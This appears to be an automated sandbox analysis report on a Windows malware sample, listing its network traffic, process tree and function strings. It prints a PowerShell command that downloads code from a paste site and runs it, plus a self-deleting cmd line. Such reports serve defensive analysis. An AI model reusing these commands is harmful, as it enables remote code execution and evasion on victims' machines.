WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 15:16:35.242903948 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.242950916 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:35.243035078 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.255039930 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.255070925 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:35.859103918 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:35.859185934 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.894399881 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.894433975 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:35.894777060 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:35.914676905 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:35.959342957 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:36.341269016 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:36.341326952 CET	443	49712	188.114.97.3	192.168.2.8
Oct 28, 2024 15:16:36.341480970 CET	49712	443	192.168.2.8	188.114.97.3
Oct 28, 2024 15:16:36.345411062 CET	49712	443	192.168.2.8	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 15:16:35.225148916 CET	51200	53	192.168.2.8	1.1.1.1
Oct 28, 2024 15:16:35.234810114 CET	53	51200	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 15:16:35.225148916 CET	192.168.2.8	1.1.1.1	0x7a38	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 15:16:35.234810114 CET	1.1.1.1	192.168.2.8	0x7a38	No error (0)	paste.ee		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 15:16:35.234810114 CET	1.1.1.1	192.168.2.8	0x7a38	No error (0)	paste.ee		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	188.114.97.3	443	6692	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 14:16:35 UTC	160	OUT	GET /d/7BWJv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: paste.ee Connection: Keep-Alive
2024-10-28 14:16:36 UTC	720	IN	HTTP/1.1 404 Not Found Date: Mon, 28 Oct 2024 14:16:36 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UStKtoUB%2BMn6VxYd6LAGk1XSBFZccNRFH%2F%2F0%2BRkciZyvLTVzmdhTZsKMaAYaMJJXp%2FETulPobVU%2BrdHglxWwYdtXDGFlCmkgTWBrD5VdVLznzv6mByPejcM1iw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b8b691fd32ca2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=774&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=b691612755f26c0e&ts=493&x=0"

Target ID:	0
Start time:	10:16:16
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\EwKKdCrEDu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EwKKdCrEDu.exe"
Imagebase:	0x370000
File size:	16'803'840 bytes
MD5 hash:	2DC8CDF825E23FF1DF1AD11B3A6F1973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:16:26
Start date:	28/10/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xaf0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:16:33
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
Imagebase:	0xf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:16:33
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:16:34
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:16:34
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.4%
Total number of Nodes:	1794
Total number of Limit Nodes:	14

Executed Functions

Function 006E1210 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 274
processsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,97F6FAD1,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?,97F6FAD1), ref: 006E135D
GetLastError.KERNEL32 ref: 006E146A
Sleep.KERNELBASE(000003E8), ref: 006E1483
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E14B4
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 006E1500
CloseHandle.KERNELBASE(?), ref: 006E1512
CloseHandle.KERNEL32(?), ref: 006E151A

Strings

powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , xrefs: 006E124F
cmd.exe /c del /f /q "%s", xrefs: 006E14C1
D, xrefs: 006E1314
CreateProcess failed (%d)., xrefs: 006E1471

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CloseCreateHandleProcess$ErrorFileLastModuleNameSleep
String ID: CreateProcess failed (%d).$D$cmd.exe /c del /f /q "%s"$powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
API String ID: 2671085826-1110349582
Opcode ID: 13e555dfb9c137fac58e97c3fd97f40b801e17f94db6c4bfe7be41a9cebd6c19
Instruction ID: 3655aa7cd5e11f13f2c70eab50faf392e7591f184dfce833bb306f7ec15cbec7
Opcode Fuzzy Hash: 13e555dfb9c137fac58e97c3fd97f40b801e17f94db6c4bfe7be41a9cebd6c19
Instruction Fuzzy Hash: 79A1F5B1A013689FDB289F25CC45BEDB377AB85710F244299F209AB2C1DB715ED09F44

Function 006E9E11 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,97F6FAD1,?,006E9F20,006E6716,?,00000000,?), ref: 006E9ED2

Strings

api-ms-, xrefs: 006E9E68
ext-ms-, xrefs: 006E9E7C

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: a879d63ce5583bcce8633218fdffe3b3f566c5f074a936dd0c9668fe454d06ca
Instruction ID: d43bbba0a00652411063abd8e0c5765d2f0a3318c19c92a72747da32c6c20a3a
Opcode Fuzzy Hash: a879d63ce5583bcce8633218fdffe3b3f566c5f074a936dd0c9668fe454d06ca
Instruction Fuzzy Hash: 8F21D571A02361A7DB21EB22DC40EEA776B9F81760F251520FA05A73E0EB30ED00C6E0

Function 006F2414 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 006F2499
__alloca_probe_16.LIBCMT ref: 006F2562
__freea.LIBCMT ref: 006F25C9

Part of subcall function 006EA7CC: HeapAlloc.KERNEL32(00000000,?,?,?,006EBAAF,00001000,?,?,?,?,006E6781,?,?,?), ref: 006EA7FE

__freea.LIBCMT ref: 006F25DC
__freea.LIBCMT ref: 006F25E9

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e900b2230cdb39e9fc59fddd62e7974c1283828d65af18cb851275e3b10c51dc
Instruction ID: e0d4dc5a948050be67b5a3b18e556f3943fadd09c42f50e982b2d4ab4cbbb02a
Opcode Fuzzy Hash: e900b2230cdb39e9fc59fddd62e7974c1283828d65af18cb851275e3b10c51dc
Instruction Fuzzy Hash: 4D51CE7260024BABEB209FA5CCA1EFB7AABEF44750B15052DFE04D6250EA70DC51CA64

Function 006E9246 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(006E9350,?,006E9240,00000000,?,?,006E9350,97F6FAD1,?,006E9350), ref: 006E9257
TerminateProcess.KERNEL32(00000000,?,006E9240,00000000,?,?,006E9350,97F6FAD1,?,006E9350), ref: 006E925E
ExitProcess.KERNEL32 ref: 006E9270

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7521f8576e7091451548fdf4797d7e28a77559910e3aa3a6aef1bd6a06ede129
Instruction ID: feeadd6432f7a45a2ad2e1239b50860f0c72a1e781e3fcc5e7f2b337e2ecbd26
Opcode Fuzzy Hash: 7521f8576e7091451548fdf4797d7e28a77559910e3aa3a6aef1bd6a06ede129
Instruction Fuzzy Hash: DCD09231011348BFCF512F62DE0D8AD3F2BAF40345B205024BA095A272CF769A92DBA4

Function 006ED17C Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006ECCB3: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 006ECCDE

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,006ECFC3,?,00000000,?,?,?), ref: 006ED1DD
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,006ECFC3,?,00000000,?,?,?), ref: 006ED219

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 82dc57993cc159374c4126e3cd6c6c545a69f82afbcbeb529b744de56e4f2fdd
Instruction ID: dfb3d9f34b7a69c00a2e32b4c5e6e59f5983230a6ac24051430e176a63b8135e
Opcode Fuzzy Hash: 82dc57993cc159374c4126e3cd6c6c545a69f82afbcbeb529b744de56e4f2fdd
Instruction Fuzzy Hash: 26511371A013859EDB20CF76C8406FEBBF7EF91304F18446ED296872A1E675DA06CB51

Function 006EA167 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,006F2504,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 006EA19B
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,006F2504,?,?,-00000008,?,00000000), ref: 006EA1B9

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8051b8366bfcc4f4896ec5a364c872326915015df11cfeb02e4fc3e990ddf75b
Instruction ID: 6a3c8ab70ed9c0c370fa0bcc9472dc8d60d9ba5d317e73a7b547a5d2332ef622
Opcode Fuzzy Hash: 8051b8366bfcc4f4896ec5a364c872326915015df11cfeb02e4fc3e990ddf75b
Instruction Fuzzy Hash: 34F0763200129ABBCF126F91DC05EEE3F67EF483A0F198114FA1865120CB36D832EB95

Function 006ECD87 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,006ECFC3,?), ref: 006ECDB9

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: d3272475107b1e1db61daae898fbd8451a2946cb4a90e30209971a5c3774788d
Instruction ID: 6c9d858efe5d938e6812d70c3913d9827795fd12d6873ee90c4fceca6a5425fc
Opcode Fuzzy Hash: d3272475107b1e1db61daae898fbd8451a2946cb4a90e30209971a5c3774788d
Instruction Fuzzy Hash: 8D5149B19052989FDB118A29CC84BF9BBBEFF15310F2401E9E459C7142D3359D46CF60

Function 006E9EDC Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a39970f2b6f04e2d67f2c12f450dd7bc224ec19ef201de8e6cede6acc16bbf9
Instruction ID: 60dd433df6a0bce8d7db8eebab069416cc96f7d5c7b822dae2fd83fef5d1a3b7
Opcode Fuzzy Hash: 8a39970f2b6f04e2d67f2c12f450dd7bc224ec19ef201de8e6cede6acc16bbf9
Instruction Fuzzy Hash: 6501F5336053505F8F12CB6AED40A6A37A7BFC13203244525F904D72A4EF31DC11D7A5

Non-executed Functions

Function 006F02AB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006F04C2

Strings

1#INF, xrefs: 006F03E1
1#SNAN, xrefs: 006F03B7
1#QNAN, xrefs: 006F03BE
1#IND, xrefs: 006F03B0

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7d8ab3e7835a0c342c28780edda28c3e8ea4201212e93e5f3500e80cc1896424
Instruction ID: 70cb7f248a8ee0b8d3ab853b87cafd96e4fc01e13830644f2f1768426676bb73
Opcode Fuzzy Hash: 7d8ab3e7835a0c342c28780edda28c3e8ea4201212e93e5f3500e80cc1896424
Instruction Fuzzy Hash: D5D23972E0922D8FDB64CE28CD407EAB7B6EB45345F1441EAD50DE7241EB78AE818F41

Function 006EFE00 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b399fc862c95593cd49e9b2481bf4cbe9590a962e80f832deb47699fab47160b
Instruction ID: bbfa8224f4df68ccae0fb276849866f8d67ec8bab49c2ea4dbbe48e1f0b01095
Opcode Fuzzy Hash: b399fc862c95593cd49e9b2481bf4cbe9590a962e80f832deb47699fab47160b
Instruction Fuzzy Hash: 1E021C71E012199BDF14CFA9D8806EEBBF2FF49314F248269D619E7381D731AA418B94

Function 006E1F1A Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,006FC600), ref: 006E1F26
IsDebuggerPresent.KERNEL32 ref: 006E1FF2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E200B
UnhandledExceptionFilter.KERNEL32(?), ref: 006E2015

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d37b1f19627ab412435c91cba6c279e42ce8c023774e90c9cab1f3c9481a0479
Instruction ID: 4a47928d2c699ef5482738849fd9ac23eb93d118930be0dad57a7de5423a64ed
Opcode Fuzzy Hash: d37b1f19627ab412435c91cba6c279e42ce8c023774e90c9cab1f3c9481a0479
Instruction Fuzzy Hash: 1C3129B5D0231D9BDB61DF65D949BCDBBB9AF08300F1041AAE40CAB250EB719A85CF45

Function 006E85EE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006E86E6
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006E86F0
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 006E86FD

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 45544f62965923d094c92ef390e8fd6245560614e2cf5fe36d0535e3967f2748
Instruction ID: 4867b4dd42104f3a50031b801cd1865d3d0970dcce87ff507c742f0d024bf6bd
Opcode Fuzzy Hash: 45544f62965923d094c92ef390e8fd6245560614e2cf5fe36d0535e3967f2748
Instruction Fuzzy Hash: 7B31D57490232D9BCB61DF25D989BDCBBB9BF08310F5041DAE40CA7251EB709B858F44

Function 006E75DF Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

/Kn, xrefs: 006E7925
0, xrefs: 006E7770

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /Kn$0
API String ID: 0-1558095828
Opcode ID: ffb77642213e8182fb1fb123c80902ed1bedc4a586a4d14d1c01a27b8bbeaf6e
Instruction ID: a793bfc2157c41795dcd8f57f04f492272b0692136843f01ba55bd96b648f9fd
Opcode Fuzzy Hash: ffb77642213e8182fb1fb123c80902ed1bedc4a586a4d14d1c01a27b8bbeaf6e
Instruction Fuzzy Hash: 39D11030A0AB868FCB24CF6AC484ABEB7B3FF54318B24461DD4569B391D730AD42CB54

Function 006F503D Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,006F5038,00000000,?,00000008,?,?,006F4C3B,00000000), ref: 006F526A

Memory Dump Source

